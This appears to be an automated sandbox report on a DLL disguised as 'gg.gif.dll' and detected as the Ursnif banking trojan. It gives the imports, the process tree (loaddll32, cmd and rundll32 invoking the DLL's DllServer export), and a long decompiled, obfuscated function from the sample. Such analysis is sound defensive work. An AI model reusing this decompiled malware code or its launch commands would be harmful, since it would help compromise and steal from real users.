gdiplus.dll	GdipEnumerateMetafileDestPointI, GdipCreateBitmapFromHBITMAP, GdipSetPenUnit, GdipGetImageEncoders, GdipGetPathPointsI
winspool.drv	FindNextPrinterChangeNotification, ConnectToPrinterDlg, SetPrinterDataW, GetPrinterW, DeletePrinterDataExW
shell32.dll	SHGetSpecialFolderPathA
advapi32.dll	GetKernelObjectSecurity, CryptEnumProviderTypesA, RegQueryValueExW, RegisterIdleTask

Exports

Name	Ordinal	Address
DllServer	1	0x1000447b

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 5408 Parent PID: 5492

General

Start time:	09:58:22
Start date:	06/04/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\gg.gif.dll'
Imagebase:	0x9a0000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.240096521.0000000002290000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 5504 Parent PID: 5408

General

Start time:	09:58:23
Start date:	06/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gg.gif.dll',#1
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5572 Parent PID: 5408

General

Start time:	09:58:23
Start date:	06/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\gg.gif.dll,DllServer
Imagebase:	0xf40000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.257345092.0000000000F10000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5552 Parent PID: 5504

General

Start time:	09:58:23
Start date:	06/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\gg.gif.dll',#1
Imagebase:	0xf40000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.287291124.0000000000F20000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 5408 Parent PID: 5492 loaddll32.exeCOMMON

Executed Functions

Function 02275F16, Relevance: 2.8, APIs: 1, Instructions: 1269
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E02275F16(void* __eax, signed int __ebx, void* __ecx, signed int __edx, signed int __esi, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __edi;
				signed int _t610;
				void* _t612;
				signed int _t613;
				intOrPtr _t619;
				void* _t626;
				void* _t628;
				void* _t630;
				signed int _t631;
				signed int _t633;
				signed int _t636;
				signed int _t638;
				void* _t640;
				intOrPtr _t641;
				signed int _t644;
				void* _t646;
				signed int _t647;
				signed int _t650;
				signed int _t652;
				signed int _t653;
				intOrPtr _t656;
				signed int _t658;
				signed int _t661;
				signed int _t665;
				void* _t667;
				signed int _t668;
				signed int _t671;
				signed int _t675;
				signed int _t677;
				void* _t679;
				signed int _t680;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				void* _t691;
				signed int _t692;
				signed int _t698;
				signed int _t701;
				signed int _t706;
				void* _t708;
				intOrPtr _t709;
				signed int _t711;
				void* _t713;
				signed int _t714;
				signed int _t717;
				intOrPtr _t720;
				signed int _t722;
				void* _t724;
				signed int _t726;
				intOrPtr _t729;
				void* _t730;
				signed int _t733;
				void* _t739;
				void* _t741;
				void* _t742;
				signed int _t744;
				void* _t746;
				signed int _t747;
				signed int _t753;
				signed int _t756;
				signed int _t760;
				void* _t762;
				signed int _t767;
				signed int _t771;
				void* _t773;
				void* _t775;
				void* _t776;
				intOrPtr _t778;
				signed int _t781;
				signed int _t785;
				intOrPtr _t788;
				signed int _t791;
				intOrPtr _t794;
				signed int _t797;
				signed int _t813;
				signed int _t816;
				void* _t819;
				signed int _t821;
				signed int _t824;
				void* _t827;
				void* _t828;
				void* _t830;
				signed int _t836;
				signed int _t840;
				signed int _t842;
				signed int _t844;
				signed int _t851;
				signed int _t856;
				signed int _t859;
				signed int _t862;
				signed int _t865;
				signed int _t867;
				signed int _t869;
				signed int _t875;
				signed int _t882;
				void* _t888;
				signed int _t889;
				signed int _t893;
				signed int _t896;
				signed int _t901;
				signed int _t906;
				signed int _t908;
				signed int _t916;
				signed int _t920;
				signed int _t924;
				signed int _t926;
				signed int _t928;
				signed int _t931;
				signed int _t934;
				signed int _t936;
				signed int _t939;
				signed int _t945;
				signed int _t947;
				signed int _t950;
				signed int _t953;
				signed int _t955;
				signed int _t958;
				void* _t966;
				signed int _t969;
				signed int _t975;
				signed int _t977;
				signed int _t979;
				signed int _t981;
				signed int _t986;
				signed int _t987;
				signed int _t1002;
				signed int _t1005;
				signed int _t1009;
				signed int _t1012;
				signed int _t1015;
				signed int _t1018;
				signed int _t1020;
				signed int _t1023;
				signed int _t1026;
				signed int _t1028;
				signed int _t1031;
				signed int _t1034;
				signed int _t1035;
				void* _t1036;
				long _t1041;
				void* _t1043;
				signed int _t1045;
				signed int _t1052;
				signed int _t1054;
				signed int _t1057;
				signed int _t1060;
				signed int _t1063;
				signed int _t1065;
				signed int _t1068;
				void* _t1069;
				signed int _t1071;
				signed int _t1074;
				void* _t1077;
				signed int _t1078;
				signed int _t1081;
				signed int _t1085;
				void* _t1089;
				signed int _t1091;
				void* _t1097;
				void* _t1102;
				signed int _t1103;
				signed int _t1106;
				void* _t1109;
				signed int _t1112;
				signed int _t1119;
				signed int* _t1120;
				signed int* _t1121;
				signed int* _t1122;
				signed int* _t1123;
				signed int* _t1124;
				signed int* _t1125;
				signed int* _t1126;
				signed int* _t1127;
				signed int* _t1128;
				signed int* _t1129;
				signed int* _t1130;
				signed int* _t1131;
				signed int* _t1132;
				signed int* _t1133;
				signed int* _t1134;
				signed int* _t1136;
				signed int* _t1139;
				signed int* _t1140;
				signed int* _t1141;
				signed int* _t1142;
				signed int* _t1143;
				signed int* _t1144;

				_t1063 = __esi;
				_t813 = __ebx;
				_push(__eax);
				 *_t1119 =  *_t1119 & 0x00000000;
				 *_t1119 =  *_t1119 + _t1102;
				_t1103 = _t1119;
				_t1120 = _t1119 + 0xfffffff0;
				_push(_t1103);
				 *_t1120 =  *_t1120 & 0x00000000;
				 *_t1120 =  *_t1120 + __ecx;
				_push(__ecx);
				 *_t1120 =  *_t1120 & 0x00000000;
				 *_t1120 =  *_t1120 ^ __edx;
				_push(_t1103);
				 *_t1120 =  *_t1120 ^ _t1103;
				 *_t1120 =  *_t1120 ^ __ebx + 0x0041cca8;
				_v16 = _v16 & 0x00000000;
				_push(_v16);
				 *_t1120 =  *_t1120 + __ebx + 0x41cd5f;
				_push( *((intOrPtr*)(__ebx + 0x41f068))());
				_pop( *_t7);
				_push(_v16);
				_pop( *_t9);
				_pop( *_t10);
				_t920 = _v16;
				_t1121 = _t1120 - 0xfffffffc;
				_push(__esi);
				 *_t1121 =  *_t1121 ^ __esi;
				 *_t1121 =  *_t1120;
				_push(_v16);
				 *_t1121 = _t920;
				_push(_t1002);
				 *_t1121 =  *_t1121 - _t1002;
				 *_t1121 =  *_t1121 ^ __ebx + 0x0041c01b;
				_t610 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_push(_v16);
				 *_t1121 = _t610;
				_push(__esi);
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + __ebx + 0x41c678;
				_t612 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_pop( *_t18);
				_push(_t920);
				 *_t20 = _t612;
				_v20 = _v20 + _v20;
				_push(_v20);
				_pop(_t613);
				_v20 = _t613;
				_t836 = 0 ^  *(__ebx + 0x41c55d);
				if(_t836 > _v20) {
					_push(_v12);
					 *_t1121 = __ebx + 0x41c01b;
					_push(_t1103);
					 *_t1121 =  *_t1121 ^ _t1103;
					 *_t1121 =  *_t1121 + __ebx + 0x41c678;
					_push( *((intOrPtr*)(__ebx + 0x41f064))());
					_pop( *_t31);
					_push(_v20);
					_pop( *_t33);
				}
				_pop( *_t34);
				_t924 = _v20;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + _t924;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 | _t813 + 0x0041c8b2;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + _t813 + 0x41d167;
				_t619 =  *((intOrPtr*)(_t813 + 0x41f068))(_t924, _t924, _t836);
				_v12 = _t836;
				 *((intOrPtr*)(_t813 + 0x41c883)) = _t619;
				 *_t1121 = _t813 + 0x41c565;
				_v12 = 0;
				 *_t1121 =  *_t1121 | _t813 + 0x0041c574;
				_push( *((intOrPtr*)(_t813 + 0x41f060))(_v12, _v20));
				_pop( *_t48);
				_push(_v20);
				_pop( *_t50);
				_pop( *_t51);
				 *_t1121 =  *_t1121 - _t1103;
				 *_t1121 =  *_t1121 ^ _v20;
				 *_t1121 =  *_t1121 ^ _t813;
				 *_t1121 =  *_t1121 + _t813 + 0x41cd20;
				_push( *((intOrPtr*)(_t813 + 0x41f060))(_t813, _t1103));
				_pop( *_t55);
				_push(_v16);
				_pop( *_t57);
				_t626 =  *((intOrPtr*)(_t813 + 0x41f060))();
				_v16 = _v16 & 0x00000000;
				 *_t1121 =  *_t1121 + _t626;
				_v16 = _v16 & 0x00000000;
				 *_t1121 =  *_t1121 + _t813 + 0x41c3ee;
				_t628 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v16);
				 *_t1121 =  *_t1121 ^ _t924;
				 *_t1121 =  *_t1121 + _t628;
				_v12 = _v12 & 0x00000000;
				 *_t1121 =  *_t1121 | _t813 + 0x0041cfe9;
				_t630 =  *((intOrPtr*)(_t813 + 0x41f060))(_v12, _t924);
				_pop( *_t72);
				_t840 = _v20;
				 *_t74 = _t630;
				_v20 = _v20 + _t840;
				_push(_v20);
				_pop(_t631);
				_t1065 = _t1063;
				_t842 = _t840 & 0x00000000 | _t1103 & 0x00000000 ^  *(_t813 + 0x41ca09);
				_t1106 = _t1103;
				if(_t842 > _t631) {
					 *_t1121 =  *_t1121 & 0x00000000;
					 *_t1121 =  *_t1121 + _t813 + 0x41c3ee;
					 *_t1121 = _t813 + 0x41cfe9;
					_t631 =  *((intOrPtr*)(_t813 + 0x41f064))(_v12, _t813);
					_push(_t924);
					 *(_t813 + 0x41c365) =  *(_t813 + 0x41c365) & 0x00000000;
					 *(_t813 + 0x41c365) =  *(_t813 + 0x41c365) ^ _t924 & 0x00000000 ^ _t631;
				}
				_t633 = _t631 & 0x00000000 ^  *_t1121;
				_t1122 =  &(_t1121[1]);
				 *_t1122 = _t1002;
				 *(_t813 + 0x41d240) = _t633;
				_t1005 = 0;
				_pop( *_t88);
				_t926 = 0 ^ _v20;
				_pop( *_t90);
				_t844 = _t842 & 0x00000000 ^ _v16;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t926;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 | _t844;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t813 + 0x0041c624;
				_v12 = _v12 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t813 + 0x0041d36b;
				_t636 =  *((intOrPtr*)(_t813 + 0x41f068))(_v12, _t926, _t1005, _t633);
				 *(_t813 + 0x41c655) =  *(_t813 + 0x41c655) & 0x00000000;
				 *(_t813 + 0x41c655) =  *(_t813 + 0x41c655) | _t844 -  *_t1122 ^ _t636;
				_t1123 =  &(_t1122[1]);
				_v16 = _v16 & 0x00000000;
				 *_t1123 =  *_t1123 ^  *_t1122;
				_v16 = 0;
				 *_t1123 =  *_t1123 ^ _t813 + 0x0041c891;
				_t638 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v16, _t844);
				 *_t1123 =  *_t1123 - _t1106;
				 *_t1123 =  *_t1123 | _t638;
				_v12 = 0;
				 *_t1123 =  *_t1123 ^ _t813 + 0x0041c30f;
				_t640 =  *((intOrPtr*)(_t813 + 0x41f060))(_v12, _t1106);
				_t851 =  *_t1123;
				_t1124 =  &(_t1123[1]);
				 *_t113 = _t640;
				_v16 = _v16 + _t851;
				_push(_v16);
				_pop(_t641);
				_t928 = _t926;
				_v16 = _t1005;
				if((_t851 & 0x00000000 | _t1005 ^ _v16 |  *(_t813 + 0x41ca38)) > _t641) {
					_v20 = _v20 & 0x00000000;
					 *_t1124 =  *_t1124 | _t813 + 0x0041c891;
					_v12 = 0;
					 *_t1124 =  *_t1124 + _t813 + 0x41c30f;
					_t641 =  *((intOrPtr*)(_t813 + 0x41f064))(_v12, _v20);
				}
				 *_t1124 = _t928;
				 *((intOrPtr*)(_t813 + 0x41c910)) = _t641;
				_t931 = 0;
				_v12 = _t1065;
				_t1068 = _v12;
				_v12 = 0;
				 *_t1124 =  *_t1124 | 0 ^ _a4;
				_v16 = 0;
				 *_t1124 =  *_t1124 | _t813 + 0x0041c9ef;
				_t644 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v12);
				_v12 = 0;
				 *_t1124 =  *_t1124 ^ _t644;
				 *_t1124 = _t813 + 0x41cb65;
				_t646 =  *((intOrPtr*)(_t813 + 0x41f060))(_v20, _v12);
				_t1125 =  &(_t1124[1]);
				_v12 = _t931;
				_push( *_t1124 + _t646);
				_t934 = _v12;
				_pop(_t647);
				_v12 = _t647;
				_t856 = 0 ^  *(_t813 + 0x41c187);
				_t650 = _v12;
				if(_t856 > _t650) {
					_v20 = 0;
					 *_t1125 =  *_t1125 | _t813 + 0x0041c9ef;
					 *_t1125 =  *_t1125 ^ _t856;
					 *_t1125 =  *_t1125 + _t813 + 0x41cb65;
					_t650 =  *((intOrPtr*)(_t813 + 0x41f064))(_t856, _v20);
					_v16 = _t1068;
					 *(_t813 + 0x41c651) =  *(_t813 + 0x41c651) & 0x00000000;
					 *(_t813 + 0x41c651) =  *(_t813 + 0x41c651) | _t1068 ^ _v16 | _t650;
					_t1068 = _v16;
				}
				_t652 = _t650 & 0x00000000 ^  *_t1125;
				_t1126 = _t1125 - 0xfffffffc;
				 *_t162 = _t652;
				_v16 = _v16 +  *((intOrPtr*)(_t652 + 0x3c));
				_push(_v16);
				_pop(_t653);
				_t936 = _t934;
				 *_t1126 = _t653;
				 *_t1126 =  *_t1126 & 0x00000000;
				 *_t1126 =  *_t1126 ^ _t813 + 0x0041c16e;
				 *_t1126 = _t813 + 0x41ce8a;
				_t656 =  *((intOrPtr*)(_t813 + 0x41f068))(_v20, _t1068, _v20);
				 *_t1126 = _t1106;
				 *((intOrPtr*)(_t813 + 0x41c0cc)) = _t656;
				_t1109 = 0;
				_t658 =  *_t1126;
				_t1127 =  &(_t1126[1]);
				 *_t1127 = _t658;
				 *_t1127 =  *_t1127 - _t856;
				 *_t1127 =  *_t1127 ^ _t658;
				 *_t1127 =  *_t1127 - _t936;
				 *_t1127 =  *_t1127 + _t813 + 0x41c791;
				_v12 = _v12 & 0x00000000;
				 *_t1127 =  *_t1127 ^ _t813 + 0x0041ca02;
				_t661 =  *((intOrPtr*)(_t813 + 0x41f068))(_v12, _t936, _t856, _v16);
				 *_t1127 = _t936;
				 *(_t813 + 0x41c9e0) = 0 ^ _t661;
				_t939 = 0;
				_t1128 = _t1127 - 0xfffffffc;
				_v20 = _t813;
				_t1009 =  *_t1127;
				_t816 = _v20;
				_v12 = 0;
				 *_t1128 =  *_t1128 | _t816 + 0x0041c000;
				_t665 =  *((intOrPtr*)(_t816 + 0x41f060))(_v12);
				 *_t1128 =  *_t1128 ^ _t1009;
				 *_t1128 = _t665;
				 *_t1128 =  *_t1128 - _t1009;
				 *_t1128 =  *_t1128 ^ _t816 + 0x0041cc73;
				_t667 =  *((intOrPtr*)(_t816 + 0x41f060))(_t1009, _t1009);
				_t1129 =  &(_t1128[1]);
				 *_t1129 =  *_t1129 ^ _t1068;
				_t1069 = _t667;
				_t668 = _t1069 + (_t856 & 0x00000000 |  *_t1128);
				_t1071 = 0;
				_v20 = _t1009;
				_t859 = 0 ^  *(_t816 + 0x41c250);
				_t1012 = _v20;
				if(_t859 > _t668) {
					 *_t1129 =  *_t1129 - _t1012;
					 *_t1129 =  *_t1129 ^ _t816 + 0x0041c000;
					_v12 = 0;
					 *_t1129 =  *_t1129 | _t816 + 0x0041cc73;
					_t668 =  *((intOrPtr*)(_t816 + 0x41f064))(_v12, _t1012);
				}
				 *(_t816 + 0x41c695) =  *(_t816 + 0x41c695) & 0x00000000;
				 *(_t816 + 0x41c695) =  *(_t816 + 0x41c695) | _t859 & 0x00000000 ^ _t668;
				_t862 = _t859;
				 *_t1129 =  *_t1129 - _t1071;
				 *_t1129 =  *_t1129 + ( *(_t1012 + 6) & 0x0000ffff);
				 *_t1129 = _t816 + 0x41ca88;
				_t671 =  *((intOrPtr*)(_t816 + 0x41f060))(_v12, _t1071);
				_v20 = _t862;
				 *(_t816 + 0x41d151) =  *(_t816 + 0x41d151) & 0x00000000;
				 *(_t816 + 0x41d151) =  *(_t816 + 0x41d151) | _t862 ^ _v20 ^ _t671;
				_t865 = _v20;
				_pop( *_t211);
				_v8 = _v8 & 0x00000000;
				_v8 = _v8 ^ (_t816 & 0x00000000 | 0 ^ _v16);
				_t819 = _t816;
				 *_t1129 =  *_t1129 & 0x00000000;
				 *_t1129 =  *_t1129 ^ _t819 + 0x0041c863;
				_t675 =  *((intOrPtr*)(_t819 + 0x41f060))(_t819);
				 *(_t819 + 0x41c2ac) =  *(_t819 + 0x41c2ac) & 0x00000000;
				 *(_t819 + 0x41c2ac) =  *(_t819 + 0x41c2ac) | _t1109 -  *_t1129 ^ _t675;
				_t1112 = _t1109;
				 *_t1129 =  *_t1129 - _t865;
				 *_t1129 =  *_t1129 ^ _t1012;
				 *_t1129 = _t819 + 0x41ca0d;
				_t677 =  *((intOrPtr*)(_t819 + 0x41f060))(_v12, _t865);
				 *_t1129 = _t677;
				 *_t1129 = _t819 + 0x41cbe6;
				_t679 =  *((intOrPtr*)(_t819 + 0x41f060))(_v12, _v20);
				_t867 =  *_t1129;
				_t1130 = _t1129 - 0xfffffffc;
				 *_t230 = _t679;
				_v16 = _v16 + _t867;
				_push(_v16);
				_pop(_t680);
				_t821 = _t819;
				_t869 = _t867 & 0x00000000 | _t1071 & 0x00000000 ^  *(_t821 + 0x41d053);
				_t1074 = _t1071;
				if(_t869 > _t680) {
					_t235 = _t821 + 0x41ca0d; // 0x41ca0d
					_v12 = 0;
					 *_t1130 =  *_t1130 | _t235;
					_t238 = _t821 + 0x41cbe6; // 0x41cbe6
					 *_t1130 =  *_t1130 & 0x00000000;
					 *_t1130 =  *_t1130 + _t238;
					_t680 =  *((intOrPtr*)(_t821 + 0x41f064))(_t1074, _v12);
				}
				 *_t1130 = _t1012;
				 *(_t821 + 0x41c918) = 0 ^ _t680;
				_t1015 = 0;
				_v16 = _t869;
				_v16 = 0;
				 *_t1130 =  *_t1130 + (_t939 & 0x00000000 | _t869 ^ _v16 |  *(_t1015 + 0x54));
				_t247 = _t821 + 0x41d093; // 0x41d093
				 *_t1130 =  *_t1130 & 0x00000000;
				 *_t1130 =  *_t1130 | _t247;
				_t682 =  *((intOrPtr*)(_t821 + 0x41f060))(_v16);
				 *_t1130 = _t1015;
				 *(_t821 + 0x41c4f0) = 0 ^ _t682;
				_t1018 = 0;
				 *_t250 = _t821;
				_t1020 = _t1018 & 0x00000000 ^ (_t1074 ^  *_t1130 |  *(_t821 + 0x41c166));
				_t1077 = _t1074;
				 *_t1130 =  *_t1130 & 0x00000000;
				 *_t1130 =  *_t1130 ^ _v16;
				_t253 = _t821 + 0x41cfd9; // 0x41cfd9
				_v20 = 0;
				 *_t1130 =  *_t1130 | _t253;
				_t684 =  *((intOrPtr*)(_t821 + 0x41f060))(_v20, _t1077);
				_v20 = _t1020;
				 *(_t821 + 0x41c323) =  *(_t821 + 0x41c323) & 0x00000000;
				 *(_t821 + 0x41c323) =  *(_t821 + 0x41c323) | _t1020 ^ _v20 ^ _t684;
				_t1023 = _v20;
				_t1131 =  &(_t1130[1]);
				 *_t1131 = _t684;
				_t1078 = _a4;
				_v12 = _v12 & 0x00000000;
				 *_t1131 =  *_t1131 |  *_t1130;
				_t268 = _t821 + 0x41ca9e; // 0x41ca9e
				_v12 = _v12 & 0x00000000;
				 *_t1131 =  *_t1131 | _t268;
				_t689 =  *((intOrPtr*)(_t821 + 0x41f060))(_v12, _v12, 0);
				 *_t1131 =  *_t1131 & 0x00000000;
				 *_t1131 =  *_t1131 | _t689;
				_t273 = _t821 + 0x41c931; // 0x41c931
				 *_t1131 =  *_t1131 & 0x00000000;
				 *_t1131 =  *_t1131 | _t273;
				_t691 =  *((intOrPtr*)(_t821 + 0x41f060))(_v16);
				 *_t275 = _t1023;
				_v20 = _t821;
				_push(0 + _v16 + _t691);
				_t824 = _v20;
				_pop(_t692);
				_push( *((intOrPtr*)(_t824 + 0x41cccf)));
				_pop( *_t280);
				_push(_v12);
				_pop(_t875);
				if(_t875 > _t692) {
					 *_t1131 = _t824 + 0x41ca9e;
					 *_t1131 =  *_t1131 & 0x00000000;
					 *_t1131 =  *_t1131 ^ _t824 + 0x0041c931;
					_t692 =  *((intOrPtr*)(_t824 + 0x41f064))(_t1078, _v16);
					 *_t286 = _t692;
					_push(_v16);
					_pop( *_t288);
				}
				_pop( *_t289);
				_t945 = _v12;
				_v12 = _t692;
				 *_t1131 = _t875 & 0x00000000 | _t692 ^ _v12 | _t945;
				 *_t1131 =  *_t1131 ^ _t824;
				 *_t1131 =  *_t1131 + _t945;
				_v12 = 0;
				 *_t1131 =  *_t1131 ^ _t824 + 0x0041d1ba;
				 *_t1131 = _t824 + 0x41c856;
				_t698 =  *((intOrPtr*)(_t824 + 0x41f068))(_v16, _v12, _t824, _v12);
				_v20 = _t1078;
				 *(_t824 + 0x41c0c8) = 0 ^ _t698;
				_t1081 = _v20;
				_pop( *_t304);
				_t947 = 0 ^ _v20;
				_t879 = 0 ^  *_t1131;
				_t1132 = _t1131 - 0xfffffffc;
				if(_t1023 != _t1081) {
					 *_t1132 =  *_t1132 - _t1023;
					 *_t1132 =  *_t1132 ^ _t879;
					_v20 = _v20 & 0x00000000;
					 *_t1132 =  *_t1132 + _t947;
					_v16 = 0;
					 *_t1132 =  *_t1132 ^ _t824 + 0x0041c7a9;
					_t739 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v20, _t1023);
					_v12 = 0;
					 *_t1132 =  *_t1132 + _t739;
					 *_t1132 =  *_t1132 & 0x00000000;
					 *_t1132 =  *_t1132 ^ _t824 + 0x0041d026;
					_t741 =  *((intOrPtr*)(_t824 + 0x41f060))(_t824, _v12);
					_t1139 = _t1132 - 0xfffffffc;
					 *_t317 = _t741;
					_v20 = _v20 + (_t879 & 0x00000000) +  *_t1132;
					_push(_v20);
					_pop(_t742);
					_t1045 = _t1023;
					_push(0);
					 *_t1139 = _t1045;
					_t906 = 0 ^  *(_t824 + 0x41c244);
					if(_t906 > _t742) {
						 *_t1139 =  *_t1139 ^ _t906;
						 *_t1139 =  *_t1139 | _t824 + 0x0041c7a9;
						 *_t1139 =  *_t1139 & 0x00000000;
						 *_t1139 =  *_t1139 + _t824 + 0x41d026;
						_t797 =  *((intOrPtr*)(_t824 + 0x41f064))(_t824, _t906);
						_push(0);
						 *_t1139 = _t947;
						 *(_t824 + 0x41cf47) = 0 ^ _t797;
					}
					_pop( *_t326);
					_t969 = _v12;
					_t908 =  *_t1139;
					_t1140 = _t1139 - 0xfffffffc;
					do {
						asm("movsb");
						_v12 = 0;
						 *_t1140 =  *_t1140 + _t908;
						_v12 = _v12 & 0x00000000;
						 *_t1140 =  *_t1140 + _t969;
						 *_t1140 =  *_t1140 - _t969;
						 *_t1140 =  *_t1140 | _t824 + 0x0041c831;
						_t744 =  *((intOrPtr*)(_t824 + 0x41f060))(_t969, _v12, _v12);
						 *_t1140 =  *_t1140 ^ _t1112;
						 *_t1140 =  *_t1140 ^ _t744;
						 *_t1140 =  *_t1140 & 0x00000000;
						 *_t1140 =  *_t1140 ^ _t824 + 0x0041c7fa;
						_t746 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1081, _t1112);
						_t1141 =  &(_t1140[1]);
						 *_t337 = _t746;
						_v20 = _v20 +  *_t1140;
						_push(_v20);
						_pop(_t747);
						_t1081 = _t1081;
						_v12 = _t747;
						if((0 ^  *(_t824 + 0x41c054)) > _v12) {
							 *_t1141 = _t824 + 0x41c831;
							 *_t1141 = _t824 + 0x41c7fa;
							_t794 =  *((intOrPtr*)(_t824 + 0x41f064))(_v16, _v16);
							_v16 = _t969;
							 *((intOrPtr*)(_t824 + 0x41c254)) = _t794;
						}
						_pop( *_t352);
						_t969 = 0 + _v12;
						_t1140 = _t1141 - 0xfffffffc;
						_t908 =  *_t1141 - 1;
					} while (_t908 != 0);
					 *_t1140 =  *_t1140 & 0x00000000;
					 *_t1140 =  *_t1140 ^ _t969;
					 *_t1140 =  *_t1140 & 0x00000000;
					 *_t1140 =  *_t1140 ^ _t824 + 0x0041ccd3;
					_v20 = 0;
					 *_t1140 =  *_t1140 ^ _t824 + 0x0041c339;
					_t753 =  *((intOrPtr*)(_t824 + 0x41f068))(_v20, _t908, _t908);
					 *(_t824 + 0x41d2bf) =  *(_t824 + 0x41d2bf) & 0x00000000;
					 *(_t824 + 0x41d2bf) =  *(_t824 + 0x41d2bf) ^ _t969 ^  *_t1140 ^ _t753;
					_t975 =  *_t1140;
					_t1142 = _t1140 - 0xfffffffc;
					_v12 = _t753;
					_t756 = _v12;
					 *_t1142 =  *_t1142 ^ _t756;
					 *_t1142 =  *_t1142 ^ _t975;
					_v20 = _v20 & 0x00000000;
					 *_t1142 =  *_t1142 ^ _t824 + 0x0041c8b7;
					_push( *((intOrPtr*)(_t824 + 0x41f060))(_v20, _t756, _t969));
					_pop( *_t371);
					_push(_v16);
					_pop( *_t373);
					_pop( *_t374);
					_t977 = _t975 & 0x00000000 ^ _v16;
					 *(_t824 + 0x41c60a) = 0x40;
					 *_t1142 = _t977;
					_v16 = 0;
					 *_t1142 =  *_t1142 ^ _t824 + 0x0041c4cb;
					_t760 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v20);
					 *_t1142 = _t760;
					 *_t1142 = _t824 + 0x41c438;
					_t762 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v12);
					_pop( *_t386);
					 *_t1142 =  *_t1142 | _t824;
					_t830 = _t762;
					_t824 = 0;
					_v16 =  *((intOrPtr*)(_t824 + 0x41c166));
					_t916 =  *(_t824 + 0x41d118);
					_t1052 = _v16;
					if(_t916 > _t830 + _v20 + (_t908 & 0x00000000)) {
						_t391 = _t824 + 0x41c4cb; // 0x41c4cb
						 *_t1142 =  *_t1142 - _t916;
						 *_t1142 =  *_t1142 + _t391;
						_t392 = _t824 + 0x41c438; // 0x41c438
						 *_t1142 =  *_t1142 ^ _t977;
						 *_t1142 =  *_t1142 | _t392;
						_t791 =  *((intOrPtr*)(_t824 + 0x41f064))(_t977, _t916);
						_v20 = _t977;
						 *(_t824 + 0x41c583) =  *(_t824 + 0x41c583) & 0x00000000;
						 *(_t824 + 0x41c583) =  *(_t824 + 0x41c583) | _t977 - _v20 ^ _t791;
					}
					_t979 =  *_t1142;
					_t1143 = _t1142 - 0xfffffffc;
					_t401 = _t824 + 0x41c60a; // 0x41c60a
					 *_t1143 =  *_t1143 - _t979;
					 *_t1143 =  *_t1143 ^ _t401;
					 *_t1143 = _t979;
					_t403 = _t824 + 0x41cb46; // 0x41cb46
					 *_t1143 =  *_t1143 & 0x00000000;
					 *_t1143 =  *_t1143 + _t403;
					_t404 = _t824 + 0x41c91c; // 0x41c91c
					 *_t1143 = _t404;
					_t767 =  *((intOrPtr*)(_t824 + 0x41f068))(_v20, _t824, _v16, _t979);
					 *_t1143 = _t1081;
					 *(_t824 + 0x41cf40) = 0 ^ _t767;
					_t1097 = 0;
					_t981 =  *_t1143;
					_t1144 =  &(_t1143[1]);
					_pop( *_t408);
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 + (0 ^ _v20);
					 *_t1144 = _t981;
					_t411 = _t824 + 0x41cc6e; // 0x41cc6e
					 *_t1144 = _t411;
					_t771 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v16, _t916);
					 *(_t824 + 0x41c082) =  *(_t824 + 0x41c082) & 0x00000000;
					 *(_t824 + 0x41c082) =  *(_t824 + 0x41c082) ^ _t981 & 0x00000000 ^ _t771;
